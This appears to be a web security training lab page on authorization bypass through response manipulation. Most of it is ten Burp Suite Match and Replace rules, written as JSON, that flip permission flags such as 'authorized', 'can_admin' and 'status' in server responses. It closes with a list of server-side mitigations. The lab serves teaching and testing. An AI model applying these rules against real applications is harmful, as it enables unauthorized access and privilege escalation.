Lab 6: Authorization Bypass - Response Manipulation Labs

Difficulty: Medium

Lab Overview

This lab demonstrates authorization bypass vulnerabilities where attackers can use Burp Suite to modify authorization responses and bypass access controls.

Objective: Understand how authorization bypass attacks work and how to exploit them using Burp Suite.

Authorization System

Check Access

Test authorization with response manipulation:

Check Role

Check user role authorization:

Check Permission

Check user permission authorization:

Authorization Bypass Tester

⚠️ Authorization Bypass Warning

This lab demonstrates authorization bypass vulnerabilities:

Access Control - Bypass access controls
Role Bypass - Bypass role restrictions
Permission Bypass - Bypass permission checks
Resource Bypass - Bypass resource restrictions

Burp Suite Rules

Use these Burp Suite Match and Replace rules:

"authorized":false → "authorized":true
"can_read":false → "can_read":true
"can_write":false → "can_write":true
"can_delete":false → "can_delete":true

Authorization Bypass Rules

Access Control Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"authorized\":false", "string_replace": "\"authorized\":true" }

Read Permission Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_read\":false", "string_replace": "\"can_read\":true" }

Write Permission Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_write\":false", "string_replace": "\"can_write\":true" }

Delete Permission Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_delete\":false", "string_replace": "\"can_delete\":true" }

Admin Permission Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_admin\":false", "string_replace": "\"can_admin\":true" }

Status Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"denied\"", "string_replace": "\"status\":\"allowed\"" }

Vulnerability Details

Type: Authorization Bypass
Severity: High
Method: Burp Suite Match and Replace
Issue: Client-side trust of authorization responses

Attack Vectors

Access Control Bypass: Bypass access controls
Permission Bypass: Bypass permission checks
Role Bypass: Bypass role restrictions
Resource Bypass: Bypass resource restrictions

Authorization Bypass Examples

Use these Burp Suite Match and Replace rules to exploit authorization bypass vulnerabilities:

1. Access Control Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"authorized\":false",
  "string_replace": "\"authorized\":true"
}

// This rule bypasses access controls
// Example: "authorized":false becomes "authorized":true

2. Read Permission Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"can_read\":false",
  "string_replace": "\"can_read\":true"
}

// This rule bypasses read permissions
// Example: "can_read":false becomes "can_read":true

3. Write Permission Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"can_write\":false",
  "string_replace": "\"can_write\":true"
}

// This rule bypasses write permissions
// Example: "can_write":false becomes "can_write":true

4. Delete Permission Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"can_delete\":false",
  "string_replace": "\"can_delete\":true"
}

// This rule bypasses delete permissions
// Example: "can_delete":false becomes "can_delete":true

5. Admin Permission Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"can_admin\":false",
  "string_replace": "\"can_admin\":true"
}

// This rule bypasses admin permissions
// Example: "can_admin":false becomes "can_admin":true

6. Status Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"status\":\"denied\"",
  "string_replace": "\"status\":\"allowed\""
}

// This rule bypasses status restrictions
// Example: "status":"denied" becomes "status":"allowed"

7. Role Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"has_role\":false",
  "string_replace": "\"has_role\":true"
}

// This rule bypasses role checks
// Example: "has_role":false becomes "has_role":true

8. Permission Grant Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"granted\":false",
  "string_replace": "\"granted\":true"
}

// This rule bypasses permission grants
// Example: "granted":false becomes "granted":true

9. Resource Access Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"access_granted\":false",
  "string_replace": "\"access_granted\":true"
}

// This rule bypasses resource access
// Example: "access_granted":false becomes "access_granted":true

10. Feature Access Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"feature_enabled\":false",
  "string_replace": "\"feature_enabled\":true"
}

// This rule bypasses feature access
// Example: "feature_enabled":false becomes "feature_enabled":true

Real-World Attack Scenarios

Complete authorization bypass and unauthorized access
Privilege escalation and admin access
Data manipulation and integrity issues
Compliance violations and legal issues
Business process disruption and operational impact
Resource abuse and unauthorized operations

Mitigation Strategies

Implement server-side authorization validation
Use response integrity checks and signatures
Implement proper access controls
Use secure coding practices
Regular security testing and vulnerability assessments
Monitor for unusual authorization patterns
Implement proper input validation
Use role-based access control (RBAC)
Implement proper error handling
Educate users about security threats
Use multi-factor authentication
Implement proper logging and monitoring
Use authorization bypass detection tools
Implement proper audit trails